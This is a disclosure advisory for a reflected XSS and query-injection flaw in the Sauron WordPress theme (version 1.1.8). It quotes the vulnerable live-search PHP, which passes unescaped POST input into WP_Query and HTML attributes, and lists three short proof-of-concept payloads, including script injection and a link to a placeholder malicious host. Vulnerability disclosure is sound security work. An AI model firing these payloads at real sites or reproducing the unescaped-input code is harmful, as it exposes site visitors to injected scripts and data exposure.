Sauron [Reflected XSS]

Description

Theme Sauron is vulnerable to Reflected XSS attack because it doesn’t properly escapes search string before outputting results in live search.

This themes uses a live search implementation which outputs the contents of the search input to a popup window under the live search field. By passing a malicious search string it is possible to execute arbitrary JS code to victims browser.

Additionally because the search string is directly passed to WP_Query an attacker can manipulate the query to the database, queering private posts, other post types etc.

Vulnerable code:

public static function live_posts_search(){
  global $wdwt_front, 
    $wp_query,
    $post;
  
  $s=$_POST["s"];
  $count = 4;
  $date_enable =  $wdwt_front->get_param('date_enable');
  $grab_image = $wdwt_front->get_param('grab_image');
  $wp_query = new WP_Query('posts_per_page='.$count.'&s='.$s.'&order=DESC'); 
  ?>
  <ul id="live_search">
  <?php 
  if(!empty($wp_query->posts)){
  while ($wp_query->have_posts() ) : $wp_query->the_post();
  
  $date = new DateTime($post->post_date);
  $date_result = $date->format('M d, Y');
  
  $tumb_id = get_post_thumbnail_id( $post->ID );
  $thumb_url=wp_get_attachment_image_src($tumb_id,'full');

  if( $thumb_url ) {
    $thumb_url = $thumb_url[0];
  }  
  else {
    $thumb_url = self::catch_that_image();
    $thumb_url = $thumb_url['src'];
  }
  $background_image = $thumb_url;
  
  
  ?>
    <li>
      <?php if(has_post_thumbnail() || $grab_image){ ?>
      <div class="img_div">
        <img src="<?php echo $background_image; ?>" />
      </div>
      <?php } ?>
      <div class="desc_div">
        <a href='<?php echo $post->guid; ?>' target='_blank'><span><?php the_title(); ?></span></a>
        <?php if($date_enable){ ?>
        <p class="post-meta">
          <span class="post-meta-author"><i class="fa fa-user"></i> <?php echo get_the_author(); ?></span></br>
          <span class="tie-date"><i class="fa fa-clock-o"></i><?php echo $date_result; ?></span>
        </p>
        <?php } ?>
      </div>
    </li>
  <?php endwhile; ?>
    <li class="live-search_more"><a href='<?php echo get_option( "home", get_site_url()).'?s='.$s; ?>'>View All Results</a></li>
  <?php }
  else{ ?>
    <li class="live-search_more"><a href='<?php echo get_option( "home", get_site_url()).'?s='.$s; ?>'>Nothing was found.</a></li>
  <?php } ?>
  </ul>
<?php 
}

PoC

'><script>alert(/XSS/)</script>_

' onclick=alert(/XSS/)>

'><a href=http://malicious.dev> Click me!<!-- 

---

WordPress Theme Reflected XSS XSS

---

INFO

• 3 June 2016
• Pan Vag
• web-dorado.com
• Sauron
• 1.1.8
• WordPress 4.5.2
• DWF-2016-87055